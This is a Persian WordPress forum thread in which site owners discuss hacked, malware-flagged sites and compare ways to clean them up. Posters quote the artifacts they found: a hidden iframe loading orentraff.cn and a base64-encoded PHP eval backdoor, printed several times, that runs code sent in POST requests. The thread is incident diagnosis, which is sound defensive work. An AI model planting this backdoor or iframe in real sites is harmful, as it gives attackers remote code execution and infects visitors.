انجمن

انجمن وردپرس فارسی » دیگر


سایتهای من هک و ویروسی شده اند  (۴۷ نوشته)

  • ospeyman

    آفلاین
    عضو
    تعداد نوشته‌ها: ۴۱
    تشکر شده: ۳ بار
    # نوشته شده: ۱۵ سال پیش
    ۲۴ شهریور ۱۳۸۷ - ۰۴:۳۱

    من چند تا سایت با وردپرس داشتم که همه هک شدن و گوگل هم این سایتها را مخرب تشخیص داده

    http://dorbin.balatar.com/
    http://maghal.com
    http://asroneh.com

    از طریق گوگل اگر بخواید وارد این سایتها بشید اجازه نمیده
    داخل دیتا بیش همه این سایتها این کد در چند جا اضافه شده

    <iframe src="http://orentraff.cn/in.cgi?8" width="0" height="0" style="display:none"></iframe>

    در درون سورس این سایتها هم اگر ویو سورس را بزنید این کد را می بنید
    هکر که احتمالا ربات هست هیچ پیغام هکی نداده فقط با الوده کردن سایت باعث شده فایرفاکس و گوگل سایتها را ویروسی تشخیص بدهد .
    حالا برای بر طرف شدن مشکل سایتها و بعد برای بر طرف شدن مشکل در گوگل چکار باید بکنم ؟

  • navid

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۲۷۱۸
    تشکر شده: ۲۹۹ بار
    # نوشته شده: ۱۵ سال پیش
    ۲۴ شهریور ۱۳۸۷ - ۰۸:۳۰

    بهتر بود جستجو می کردید.
    به هر حال...
    این افزونه رو نصب کنید :
    http://wordpress.org/extend/plugins/exploit-scanner/
    فایل های آلوده رو پاک و جایگزین کنید
    نسخه وردپرس خودتون رو ارتقا بدید
    پسورد وردپرس - سی پنل - اف تی پی و ... رو هم عوض کنید ;-)

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    omid0098

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۳۱ اردیبهشت ۱۳۸۸ - ۱۴:۱۰

    سلام
    چند روزیه ویروس maleware اعصابمو خورد کرده و سایت از گوگل و فایرفاکس reported میده
    برای رفع این مشکل کارهای زیر را انجام دادم

    سیستم خودم را با آنتی ویروسی Malwarebytes' Anti-Malware اسکن کردم و چند تا فایل مشکوک پیدا شد و پاکشون کرد
    کل فایل های وردپرس رو پاک کردم و دوباره بارگزاری کردم
    فایل های پوسته رو بررسی کردم و فایلی به نام image.php اضافه شده بود, پاکش کردم + ابتدای فایل های header.php و index.php یک سری اسکریپت اضافه شده بود پاک کردم
    به گفته گناهکار, دسترسی فایل های پوسته را به 444 تغییر دادم
    برای اطمینان توی سیستم یکی از دوستان رمز cpanel و ftp را هم عوض کردم
    از gogle webmaster هم استفاده کردم
    ولی متاسفانه بازم مشکل حل نشد!
    با میزبان هم تماس گرفتم و ایشون فرمودند به ما ربطی نداره و مربوط به فایل های شما میشه! :|
    امکان داره توی db نفوذ کرده باشه؟

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    omid0098

  • websoft

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۴
    تشکر شده: ۴۹ بار
    # نوشته شده: ۱۴ سال پیش
    ۳۱ اردیبهشت ۱۳۸۸ - ۱۴:۳۴

    از FireBug استفاده كنيد ، حين بررسي درخواست هاي HTTP ، بررسي كنيد ببينيد كدوم فايل ها ارور 404 ميدن ، جديدن يك اسكريپت جاوا به طور اتومات كد يك آي فريم رو به فايل هاي :

    index.php
index.html
main.php
header.php
footer.php

    اضافه ميكنه و به يك سايت دانماركي ترافيك ميفرسته ، در حقيقت اگه نفوذ از سرور باشه ، ديگه اين مشكل توسط شما حل نخواهد شد.

  • mohsen57

    آفلاین
    عضو
    تعداد نوشته‌ها: ۹۳
    تشکر شده: ۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۳۱ اردیبهشت ۱۳۸۸ - ۱۵:۵۳

    من هم مشکل مشابه رو داشتم ویروس رو سیستم من بود و فایلهای ایندکس رو آلوده میکرد و به یک سایت هندی ترافیک می فرستاد. خدا لعنتشون کنه.

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۳۱ اردیبهشت ۱۳۸۸ - ۲۱:۰۹

    من از fire ftp فایرفاکس استفاده میکنم
    و به خاطر sftp جدیدن از نرم افزار Core FTP Pro استفاده میکنم
    FireBug چیه ؟ کارش چیه ؟ :-?

    ين بررسي درخواست هاي HTTP ، بررسي كنيد ببينيد كدوم فايل ها ارور 404 ميدن

    با این نرم افزار بررسی کنم ؟

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۱ خرداد ۱۳۸۸ - ۱۲:۲۸

    این تیبل ها توی phpMyadmin ساخته شده

    wp_DLM_CATS
 wp_DLM_DOWNLOADS
 wp_DLM_FORMATS
 wp_DLM_LOG
 wp_DLM_META
 wp_DLM_STATS

    با بقیه فرق میکنه :-? به نظرتون پاکشون کنم

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۲ خرداد ۱۳۸۸ - ۰۰:۰۳

    دوستان با حذف تیبل های

    wp_DLM_CATS
 wp_DLM_DOWNLOADS
 wp_DLM_FORMATS
 wp_DLM_LOG
 wp_DLM_META
 wp_DLM_STATS

    مشکلم حل شد از همگی ممنون @},-

  • Morteza

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۳۴۰۲
    تشکر شده: ۳۱۲۸ بار
    # نوشته شده: ۱۴ سال پیش
    ۲ خرداد ۱۳۸۸ - ۱۱:۵۲

    بکاپی نداری که ببینیم محتویات اینا چی بود؟
    در ضمن مصطفی جان برات ایمیل زدم. چک کن. *-:)

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۲ خرداد ۱۳۸۸ - ۱۴:۰۸

    آره یه بک آپ دارم برای خیلی وقت پیشه جدیدا نگرفتم
    بله دیدم ;-)

  • Morteza

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۳۴۰۲
    تشکر شده: ۳۱۲۸ بار
    # نوشته شده: ۱۴ سال پیش
    ۲ خرداد ۱۳۸۸ - ۱۵:۵۳

    میخواستم ببینم محتویات تیبل هایی که پاک کردی چی بود :-)

  • AminSanaei

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۳۳
    تشکر شده: ۲۶ بار
    # نوشته شده: ۱۴ سال پیش
    ۲ خرداد ۱۳۸۸ - ۱۷:۱۱

    الآن مثلاً صفحه اول من unranked هست. یعنی به خاطر کدی زیر هست؟

    /home/mortabet/public_html/wp-content/plugins/exploit-scanner/exploit-scanner.php

    ous code, but can also be legitimate code.",
    '$_COOKIE["yahg"]' => "YAHG Googlerank.info exploit code. See <a href='http://creativebriefing.com/wordpress-hacked-googlerankinfo/'>here</a> for further info." );
    search_install( ABSPATH, array_keys( $suspect_text ) );
    if( !empty( $modified_core_f

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۰۹:۴۸

    این چه کدیه؟

    <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

    کسی اطلاعاتی در این زمینه داره؟

    این هم به همین موضوع مربوطه , یه فایل هایی به نام image.php تو بعضی پوشه ها مثل پوشه پوسته ایجاد شده که حاوی چنین کدی هست.

  • m3ysam

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۵۱
    تشکر شده: ۲۱ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۱۳:۵۲

    با سلام
    من هم تجربه بسیاری با سر و کله زدن با این ویروس ها دارم که گفتم بد نیست تجربه های خودم را با شما به اشتراک بگذارم.
    1- ابتدا برای اینکه خیالتون راحت باشه سیستم عاملتون را به ویستا ارتقا بدید و اگر سیستم شما این قدرت را نداره بهتر است با ارتقا سیستمتون خیال خودتون را از این بابت راحت کنید و اگر واقعا محدودیت هایی دارید که نمیتوانید، بهتر است یک آنتی ویروس قدرتمند و به روز روی سیستمتون نصب کنید که بهتر است قبل از آن یک ویندوز تازه نصب کنید. من پس از نصب ویندوز ویستا دیگر هرگز با این نوع ویروسها آلوده نشدم و همینطور با ویروسهایی مثل ویروسهای اتوران .
    2- تمام پارتیشنهای خود را بویسیله آنتی ویروس چک کنید . این ویروسها تمام فایلهای با فرمت .html , .htm را آلوده به کدهای مخربی میکند که با هر بار مشاهده این صفحات سیستم خود را آلوده میکنید که آنها را هم به سایتتون منتقل میکنید. بهتر است یا تمام این صفحت را پاک کنید یا به صورت دستی کدهای مخرب را از آنها حذف کنید و همیشه به یاد داشته باشید که این نوع فرمتها را همیشه در یک فایل زیپ یا رر نگهداری کنید تا ویروس نتواند آنها را آلوده کند. حتی در صورت نیاز پارتیشنهای خود را پس از گرفتن بکاپ از اطلاعات ضروری ، فرمت کنید تا هیچ ردی از ویروس باقی نماند(در ایکس پی)
    3- پس از اینکه خیالتون از بابت کامپیوت شخصی خودتون راحت شد بهتر است که یک برون ریزی از وردپرس خودتون بگیید و سپس تمام فایهای وردپرس روی هاست را حذف کنید و وردپرس را مجدد دانلود و مجدد نصب کنید و تمام مطالب سایت خود را برون ریزی کنید . در ضمن دسترسی به فایلهای پوسته را هم محدود کنید . از نصب پلاگینهای قدیمی و غیر ضروری اجتناب کنید و سعی کنید آخرین نسخه پلاگینهای خود را نصب کنید و همینطور آخرین نسخه وردپرس را داشته باشید.

    من با این کارها به نتیجه رسیدم و همینطور دوستان دیگر هم به مسائل دیگر اشاره کردند که باید به آنها هم عمل کنید
    و بدانید که این مسائل 1 و 2 تنها مربوط به وردپس نیست و در تمام مسائل صدق میکند

    لازمه که تاکید کنم که من کوچیک تمام بچه های انجمن هستم و خدایی نکرده قصد نصیحت یا دستور یا... ندارم و هدفم فقط این بود که تجربیات ناچیز خودم را در اینجا قرار بدم تا شاید به درد یک نفر آدم مبتدی تر از خودم بخورد *-:) @},-

    موفق باشید @},-

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    Karim1504 - omid0098

  • Morteza

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۳۴۰۲
    تشکر شده: ۳۱۲۸ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۱۳:۵۶

    یه رشته php هست که با eval base 64 کد شده. باید دیکد کنی ببینی چی هست.

  • kits

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲۵
    تشکر شده: ۷۰ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۱۵:۵۸

    سلام مصطفی جان
    این جداول مربوط به پلاگین ؛دانلود مانیتور هست download-monitor

    wp_DLM_CATS
 wp_DLM_DOWNLOADS
 wp_DLM_FORMATS
 wp_DLM_LOG
 wp_DLM_META
 wp_DLM_STATS

    شما مط‍م‍نی مشکلت به خاطر این جداول بود ؟ وبا حذف اون مشکلت هم حل شد

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۲۱:۰۸

    سلام خوبی
    هرکدومش از اون جدول های بالایی 1 کیلوبایت حجم داشت
    فکر کنم تیبل دانلود منیجر اینه: :-?
    wp_downloads

  • kits

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲۵
    تشکر شده: ۷۰ بار
    # نوشته شده: ۱۴ سال پیش
    ۳ خرداد ۱۳۸۸ - ۲۳:۲۷

    سلام
    نه دانلود منیجر نه
    اسم این افزونه دانلود مانیتور هست
    نمونه اونو میتونید توی سایت من ببنید مثلا به این پست برین و برای تست فایل را دانلود کنید و یا به بخش مرکز دانلود برین و...
    http://yazdkit.com/downloads/

    http://yazdkit.com/designer-electronic-part5-alavy-1298.html/#more-1298
    این افزونه کارش خیلی درسته
    نحوه کارش اینه که مثلا شما میای یه فایلی حتی روی سرور دیگه را لینکشو بذاری توی سایت واسه دانلود و میخوای دفعات دانلود را بشماری
    یا مثلا فقط اعضا بتونن دانلود کنند و .........
    درضمن در ادیتور هم خودش اضافه میشه واسه راحتی کار
    البته جدول
    wp_DLM_LOG
    حجمش بالا هست و کلیه آی پی ها و.. را در اون ثبت میشه که از طریق مدیریت محتوای این جدول قایل حذف هست

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۴ خرداد ۱۳۸۸ - ۰۰:۰۸

    آره درسته قبلا از این افزونه را نصب کردم و ویروس هم توی این افزونه لونه کرده بود :-)

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۴ خرداد ۱۳۸۸ - ۱۱:۰۷

    man4toman گفت:
    یه رشته php هست که با eval base 64 کد شده. باید دیکد کنی ببینی چی هست.

    ممنون از راهنمایی شما , این رشته کدها تحت فایل هایی با نام image.php تو پوشه هایی ایجاد شده بودن که در حالت عادی چنین فایلی اصلا اونجا موجود نبود.

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۴ خرداد ۱۳۸۸ - ۱۱:۲۹

    سلام...
    من الان یه ایمیل دریافت کردم که نوشته بود پسورد بازآوری شد یا یه چنین چیزی...
    سریعا پسورد رو عوض کردم...
    دوستان کسی می دونه مشکل چی بوده؟
    آیا هک شدم؟
    باید چکار بکنم؟

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۴ خرداد ۱۳۸۸ - ۱۵:۲۰

    behrooz0o گفت:
    سلام...
    من الان یه ایمیل دریافت کردم که نوشته بود پسورد بازآوری شد یا یه چنین چیزی...
    سریعا پسورد رو عوض کردم...
    دوستان کسی می دونه مشکل چی بوده؟
    آیا هک شدم؟
    باید چکار بکنم؟

    این نامه رو از طرف چه جایی دریافت کردین؟

    من که این دفعه دیگه یه کلمه عبور 99 کارکتری تصادفی قرار دادم که از این نظر جای بحث نذارم. :O

    وب سایت روزنامه کیهان هم به عنوان آدرس های آلوده شناخته شد.

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۴ خرداد ۱۳۸۸ - ۲۱:۳۷

    من بعد از اینکه وب سایت هام مشکل دار شدن از قسمت Backups تو Cpanel نسخه پشتیبان پایگاه داده همه برنامه های مورد استفاده رو دریافت کردم ولی نسخه پشتیبان این دفعه دارای یه سری کارکترایی هست که دفعه قبل و تو نسخه قبلی که دریافت کرده بودم این شکلی نبود مثلا به ابتدا و انتهای فایل های .SQL یه سری کارکترهایی به این شکل اضافه شده:

    ابتدا:

    /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

    انتها:

    /*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

    و قبل از بررسی هر Table یکبار اون رو Lock و در پایانش Unlock کرده مثلا به این شکل:

    LOCK TABLESwp_optionsWRITE;
    و
    UNLOCK TABLES;

    دوستانی که در این زمینه اطلاعاتی دارن لطفا راهنمایی کنن که آیا وجود این عبارت ها تو این فایل مشکلی رو ایجاد می کنه یا نه؟

    متاسفانه بنده با MySQL در حد تخصصی کار نکردم.

    حداقل اگه بتونین تو کنترل پنل Cpanel خودتون و بخش Backups ش یه نسخه پشتیبان از پایگاه داده هم دریافت کنین قضیه روشن می شه که آیا برای شما هم همینطوره یا نه؟

    متشکرم

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۰۸:۲۲

    چه شکلی باید بفهمم که سایتم ویروسی شده یا نه؟

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۰۸:۴۱

    navid گفت:
    بهتر بود جستجو می کردید.
    به هر حال...
    این افزونه رو نصب کنید :
    http://wordpress.org/extend/plugins/exploit-scanner/
    فایل های آلوده رو پاک و جایگزین کنید
    نسخه وردپرس خودتون رو ارتقا بدید
    پسورد وردپرس - سی پنل - اف تی پی و ... رو هم عوض کنید ;-)

    آقا من هرچی می خوام توی فایل ها رو با این جستجو کنم پیغام زیرو رو میده:
    Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 155516027 bytes) in /home/shirinak/public_html/wp-content/plugins/exploit-scanner/exploit-scanner.php on line 84

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۰۹:۱۳

    behrooz0o گفت:
    چه شکلی باید بفهمم که سایتم ویروسی شده یا نه؟

    اگه شده باشه که می تونین صفحه ها و فایل های ویروسی رو تو بخش Google Webmasters وب سایت خودتون ببینین , اگرم به این مورد شک داشته باشین که می تونین فایل هارو دریافت و یکبار ویروس یابی کنین , البته پشتیبان هاست هم می تونه اینکار رو انجام بده.

    یه نفر فایل .SQL خودش رو دریافت می کنه به ما هم کمک کنه؟ 8-|

    متشکرم

  • بهرنگ

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۱۳۹۹
    تشکر شده: ۴۵۱ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۱۱:۱۰

    یه مشکلی که هست ، اینه که ، اول باید بفهمید نوع آلودگی چیه...بعد به دنبال این بگردید ببینید برای کیا پیش اومده و اونها چه راه هایی رو پیشنهاد دادن...
    متاسفانه یا خوشبختانه اینزنوعش برای من پیش نیومده ... اگر من میخواستم از دست این مشکل خلاص بشم ، اول توی افزونه هایی که استفاده میکنم تجدید نظر میکردم...به این صورت که همه ی افزونه ها رو پاک میکنیم و به بخش افزونه ها میریم تا همه ی افزونه ها غیر فعال بشه ، دیتا بیس رو بررسی میکنیم تا تیبل های اضافی رو پاک کنیم...(فقط تیبیل های اصلی رو نگه میداریم) ، فایل ها ی روی هاست رو پاک میکنیم و با فایل های جدید و تمیز جایگزین میکینم ، دسترسی ها رو چک میکینم و دسترسی های اضافی و بالا رو پایین میاریم ، همه ی پسوورد ها رو عوض میکنیم . و در نهایت پوشه افزونه ها رو دوباره در جای خودش ایجاد کنید و فقط از افزونه هایی استفاده کنید که بهشون نیاز دارید...چون همه ی افزونه ها باگ دارن و ممکنه باگ یکی از اونها باعث این مشکل شده باشه...به این نکته هم توجه کنید که همیشه وردپرستون رو به روز نگه دارید و هیچ وقت افزونه هایی که استفاده نمیکنید رو روی هاستتون نگه ندارید...اگر به افزونه ای نیاز ندارید اونو پاک کنید و افزونه ها هم همیشه به روز کنید.

    امیدوارم با این کار ها مشکلاتتون حل بشه...البته از گوگل غافل نشید و در مورد مشکلتون توی گوگل جستجو کنید...اونجا هم راه حل های خوبی داده میشه...

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۱۲:۲۱

    قضیه این Lock و Unlock شدن Table ها چیه؟

    یعنی به این مربوط می شه که گفته بودم؟

    <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

  • بهرنگ

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۱۳۹۹
    تشکر شده: ۴۵۱ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۱۲:۵۲

    نمیدونم...

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۱۴:۲۰

    mostafa1990 گفت:
    به گفته گناهکار, دسترسی فایل های پوسته را به 444 تغییر دادم

    کدوم فایل های پوسته؟ حتی فایل های سبک و تصویرها؟

    من که هرجا گشتم نتونستم در این مورد گفته ای از ایشون پیدا کنم.

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۱۷:۰۴

    کدوم فایل های پوسته؟ حتی فایل های سبک و تصویرها؟

    من که هرجا گشتم نتونستم در این مورد گفته ای از ایشون پیدا کنم.

    کل فایل های پوستتون که درون پوشه
    wp-content\themes\nametheme
    توی فیس بوک ازشون پرسیدم

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۲۱:۴۴

    با این کار ویروسی نمیشیم؟

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۲۱:۴۹

    TruthPraiser گفت:

    behrooz0o گفت:
    چه شکلی باید بفهمم که سایتم ویروسی شده یا نه؟

    اگه شده باشه که می تونین صفحه ها و فایل های ویروسی رو تو بخش Google Webmasters وب سایت خودتون ببینین , اگرم به این مورد شک داشته باشین که می تونین فایل هارو دریافت و یکبار ویروس یابی کنین , البته پشتیبان هاست هم می تونه اینکار رو انجام بده.
    یه نفر فایل .SQL خودش رو دریافت می کنه به ما هم کمک کنه؟ 8-|
    متشکرم

    این Google Webmasters کجاست؟

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۵ خرداد ۱۳۸۸ - ۲۳:۴۹

    http://www.google.com/webmasters/tools

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۶ خرداد ۱۳۸۸ - ۰۰:۰۲

    behrooz0o گفت:
    این Google Webmasters کجاست؟

    http://www.google.com/webmasters

    البته باید وب سایت خودتون رو در اون ثبت کرده باشین , بعد برای ارسال این درخواست بازنگری می تونین به صفحه Overview مربوط به وب سایت خودتون برین و درخواست رو ارسال کنین.

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۶ خرداد ۱۳۸۸ - ۰۹:۴۷

    ای بابا , باز دوباره یکی از آدرسای ما مشکل دار شد.

    دوستان یه لطف کنن این آدرس هارو ببینن چه مشکلی داره که آلوده به Malware گزارش شده:

    # http://mamali.ws/
# http://www.mamali.ws/
# http://mamali.ws/post/
# http://www.mamali.ws/post/
# http://www.mamali.ws/post/%D8%AF%D9%88-%D9%88%DB%8C%D8%B1%D8%A7%DB%8C%D8%B4%DA%AF%D8%B1-%D8%B3%D8%A7%D8%AF%D9%87-%D8%A2%D8%B3%D8%A7%D9%86-%D9%88-%D8%B3%D9%88%D8%AF%D9%85%D9%86%D8%AF-%D8%B5%D8%AF%D8%A7.html

    من که سر در نمی یارم , نسخه 2.7.1 برنامه به همراه آخرین نسخه افزونه های مورد استفاده نصب شده , سیستم خودم رو تا پیدا کردن آخرین و کوچکترین فایل مخرب جستجو کردم , فایل های برنامه رو هم رو پاکسازی کردم و حتی خیلی از فایل هارو با نسخه اصلی عوض کردم , کلمه های عبور همه عوض شدن , افزونه های AntiVirus و WordPress Exploit Scanner هم نتونستن چیز ناجالبی رو پیدا کنن.

    دوستانی لطفا یه نظر آدرس های گفته شده رو ببینن و نظر بدن چون می خوام فایل هارو پاک کنم.

    متشکرم

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۶ خرداد ۱۳۸۸ - ۱۳:۰۰

    نیازی نیست , همه اطلاعات وب سایت رو پاک کردم. :-)

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۱ خرداد ۱۳۸۸ - ۰۱:۰۳

    TruthPraiser گفت:

    behrooz0o گفت:
    این Google Webmasters کجاست؟

    http://www.google.com/webmasters
    البته باید وب سایت خودتون رو در اون ثبت کرده باشین , بعد برای ارسال این درخواست بازنگری می تونین به صفحه Overview مربوط به وب سایت خودتون برین و درخواست رو ارسال کنین.

    مجدد سلام من سایتم رو ثبت کردم اما توی قسمتی که گفتید چیزی به عنوان ویروس و... نیست!

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۱ خرداد ۱۳۸۸ - ۱۲:۲۸

    اگه اونجا موردی مشاهده نمی شه حتما بازنگری کردن و هشدار مربوط به اون رو از بخش Google Webmasters وب سایت شما برداشتن.

  • Mostafa

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۵۲۷۶
    تشکر شده: ۵۷۷۷ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۰۰:۲۸

    TruthPraiser محتوای همه سایت هاتون خالیه :-? منظورتون کدوم سایته ؟

  • behrooz0o

    آفلاین
    عضو
    تعداد نوشته‌ها: ۳۴۰
    تشکر شده: ۵۳ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۰۲:۲۱

    mostafa1990 گفت:
    TruthPraiser محتوای همه سایت هاتون خالیه :-? منظورتون کدوم سایته ؟

    مصطفی جان منظورتون منم؟

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
    ۱۴ خرداد ۱۳۸۸ - ۰۸:۵۵

    mostafa1990 گفت:
    TruthPraiser محتوای همه سایت هاتون خالیه :-? منظورتون کدوم سایته ؟

    آره آقا , من چون می خواستم زودتر وب سایت هارو از فهرست آدرس های آلوده در بیارم فایلاشون رو همون روز بعد چند ساعت پاک کردم , دیروز که یکی رو راه انداختم که الان آدرسش تو پروفایلمم هست و اگه ریفرش کنین حتما می یاد ولی اون یکی که وبلاگ بود و بالا آدرس رو گذاشتم نه , متوجه شدم مشکلش از کجاست ولی چون انقدر خراب کاری تو فایل ها زیاد بود باید همه جارو دقیق ببینم.

    آخرین مشکل که برای وبلاگ ایجاد شده بود از آدرس دامنه

    martuz.cn

    بود , لطفا این آدرس هارو ببینین:

    http://blog.unmaskparasites.com/2009/05/18/martuz-cn-is-a-new-incarnation-of-gumblar-exploit/
http://blog.scansafe.com/

    راه نفوذ به هر شکل ممکن محدود شده , حالا قصدم حذف و ریشه کنیه تمام آثار موجود از این نفوذها هست بطوریکه نفوذگرها دیگه راهی برای ورود و ایجاد اختلال مجدد نداشته باشن.

    ضمنا تو پوشه های مربوط به فایل های عکس قالب گرافیکی برنامه فایلی به نام gifimg.php یا نام هایی از این دست با چنین محتوایی ایجاد شده:

    <?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

    این فایل در اصل نباید اونجا وجود می داشت.

    متشکرم

  • TruthPraiser

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۸۵
    تشکر شده: ۱۲ بار
    # نوشته شده: ۱۴ سال پیش
